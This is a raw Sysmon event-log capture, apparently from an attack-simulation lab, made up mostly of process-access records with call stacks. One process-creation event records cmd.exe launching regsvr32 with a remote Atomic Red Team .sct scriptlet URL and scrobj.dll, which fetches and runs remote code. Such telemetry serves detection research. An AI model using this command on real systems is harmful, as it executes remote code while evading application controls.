22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360114Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360113Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360112Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360111Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360110Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360109Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360108Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.546{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360107Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.546{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360106Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.546{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360105Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.546{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360104Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.546{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360103Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.546{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360102Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.546{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360101Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.546{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360100Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.546{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360099Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.546{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360098Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.546{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360097Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.546{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360096Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.546{8e433fbf-3378-6013-6702-000000001100}29326308C:\Windows\system32\csrss.exe{8e433fbf-36df-6013-9f03-000000001100}10200C:\Windows\system32\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000360095Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.546{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+37cee|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360094Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.546{8e433fbf-36df-6013-9e03-000000001100}110569284C:\Windows\system32\cmd.exe{8e433fbf-36df-6013-9f03-000000001100}10200C:\Windows\system32\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Windows\system32\cmd.exe+134fb|C:\Windows\system32\cmd.exe+1489f|C:\Windows\system32\cmd.exe+c0c1|C:\Windows\system32\cmd.exe+b5e1|C:\Windows\system32\cmd.exe+124e4|C:\Windows\system32\cmd.exe+180dd|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000360093Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.556{8e433fbf-36df-6013-9f03-000000001100}10200C:\Windows\System32\regsvr32.exe10.0.18362.1 (WinBuild.160101.0800)Microsoft(C) Register ServerMicrosoft® Windows® Operating SystemMicrosoft CorporationREGSVR32.EXEC:\Windows\system32\regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll C:\Users\ADMINI~1\AppData\Local\Temp\IP-0A000111\Administrator{8e433fbf-337a-6013-b5aa-3d0000000000}0x3daab52HighMD5=578BAB56836A3FE455FFC7883041825B,SHA256=8FFC7F80EFBF746E49F37EA3D140F042CF71EF20B4DA2A8F02688E79295DA11D,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F{8e433fbf-36df-6013-9e03-000000001100}11056C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\system32\regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll" 13241300x8000000000000000360092Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:12:47.546{8e433fbf-36df-6013-9e03-000000001100}11056C:\Windows\system32\cmd.exeHKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1117338214-1411020952-3261875682-500\\Device\HarddiskVolume2\Windows\System32\regsvr32.exeBinary Data 10341000x8000000000000000360091Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 